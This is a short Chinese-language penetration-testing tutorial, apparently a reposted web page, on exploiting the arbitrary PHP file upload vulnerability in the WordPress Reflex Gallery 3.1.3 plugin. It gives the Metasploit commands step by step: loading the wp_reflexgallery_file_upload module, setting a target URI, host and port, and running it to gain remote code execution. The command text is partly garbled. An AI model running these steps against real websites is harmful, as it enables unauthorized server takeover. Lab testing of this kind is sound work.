渗透测试实战教程:如何利用WordPress插件Reflex Gallery的文件上传漏洞【附上漏洞利用方法】

此模块利用WordPress Reflex Gallery 3.1.3版中的任意PHP代码文件上传漏洞。该漏洞允许任意文件上传和远程代码执行
利用目标
Reflex Gallery版本3.1.3
需求
攻击者:kali Linux
受害者PC:已安装WordPress
打开Kali终端类型  msfconsole
如何利用WordPress插件Reflex Gallery的文件上传漏洞
现在输入  exploit use / unix / webapp / wp_ reflexgallery_file_upload
msf exploit (wp_reflexgallery_file_upload)>set targeturi /wordpress
msf exploit (wp_reflexgallery_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_reflexgallery_file_upload)>set rport 80
msf exploit (wp_reflexgallery_file_upload)>exploit  
如何利用WordPress插件Reflex Gallery的文件上传漏洞
转载请注明本文链接: http://www.mayidui.net/t2314.html
游客
登录后才可以回帖,登录 或者 注册